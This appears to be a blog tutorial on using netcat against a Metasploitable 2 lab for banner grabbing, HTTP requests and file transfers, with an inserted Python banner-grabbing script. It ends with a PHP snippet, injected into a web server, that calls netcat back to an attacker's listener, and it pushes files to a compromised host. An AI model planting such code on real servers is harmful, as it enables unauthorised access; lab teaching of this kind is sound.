Sunday, August 23, 2020

Using netcat for hacking

Netcat is a great network utility for reading from and writing to network connections using the TCP and UDP protocols. Netcat is often referred to as the Swiss army knife of networking tools and we will be using it a lot throughout the different tutorials on Hacking Tutorials. The most common uses for Netcat when it comes to hacking are setting up reverse and bind shells, piping and redirecting network traffic, port listening, debugging programs and scripts, and banner grabbing. In this tutorial we will learn how to use basic Netcat features such as:


  1. Banner grabbing
  2. Webserver interaction
  3. File transfers

Banner Grabbing


Service banners are often used by system administrators for inventory taking of systems and services on the network. The service banners identify the running service and often the version number too. Banner grabbing is a technique to retrieve this information about a particular service on an open port and can be used during a penetration test for performing a vulnerability assessment. When using Netcat for banner grabbing you actually make a raw connection to the specified host on the specified port. When a banner is available, it is printed to the console. Let’s see how this works in practice.

The following command is used to grab a service banner (make a raw connection to a service):

  • nc [ip address] [port]

Let’s try this on the FTP service on Metasploitable 2 which is running on port 21:

  • nc 192.168.100.100 21

Web server interaction


Netcat can also be used to interact with webservers by issuing HTTP requests. With the following command we can grab the banner of the web service running on Metasploitable 2:


  • nc 192.168.100.108 80


And then run this HTTP request:

HEAD / HTTP/1.0

(Screenshot: Apache webserver banner.)

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu) DAV/2 and the PHP version.
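As an added example (not from the original tutorial), the following Python script does by hand what the nc session above does: it opens a raw TCP connection, sends the HEAD request terminated by the empty line HTTP requires, and pulls the Server and X-Powered-By headers out of the reply so the result can feed an inventory or vulnerability assessment. The host and port are assumptions, and the sample response used for the offline check is constructed.

```python
import socket

# Constructed sample response, modelled on the Metasploitable 2 banner quoted
# above; the PHP version string is a placeholder, the page does not give it.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
    b"X-Powered-By: PHP/0.0.0-placeholder\r\n"
    b"Content-Type: text/html\r\n\r\n"
)


def build_head_request(host: str) -> bytes:
    """The request typed into nc above. HTTP/1.0 makes the server answer and
    close; the trailing empty line marks the request as complete, which is why
    nc appears to hang if you forget to press Enter twice."""
    return f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def parse_banner(response: bytes) -> dict:
    """Pull the status line and the software-identifying headers out of a reply."""
    head = response.partition(b"\r\n\r\n")[0].decode("latin-1")
    lines = head.split("\r\n")
    banner = {"status": lines[0]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        key = name.strip().lower()
        if sep and key in ("server", "x-powered-by"):
            banner[key] = value.strip()
    return banner


def grab_http_banner(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Raw TCP connect, send HEAD, read until the server closes or the timeout
    fires; the timeout keeps a silent service from stalling an inventory run."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_head_request(host))
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return parse_banner(b"".join(chunks))


if __name__ == "__main__":
    # Host and port are assumptions: the Metasploitable 2 box from the text.
    print(grab_http_banner("192.168.100.108", 80))
```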

To retrieve the top level page on the webserver we can issue the following command:


  • nc 192.168.100.108 80


And then run this HTTP request:

GET / HTTP/1.0
File transfers with Netcat


In this example we will use a Netcat connection to transfer a text file. Let's assume we have remote command execution on the target host and we want to transfer a file from the attack box to that host. First we need to set up a listener on the target host and connect to it from the attack box. We will use port 8080 for this purpose and save the file to the desktop:


  • nc -lvp 8080 > /root/Desktop/transfer.txt

On the attack box we connect to port 8080 and send the file named transfer.txt:

  • nc 192.168.100.107 8080 < /root/Desktop/transfer.txt

Netcat reverse connection

This technique is used in system hacking and web server hacking; the same connection can also be injected into a PHP file processed by the web server.

Example:

    <?php
    // same nc client call as in the file transfer above, run by the web server
    system("nc 192.168.100.107 8080");
    ?>

This gives you back a connection on port 8080.

You listen for it on your own system with:

  • nc -l -p 8080
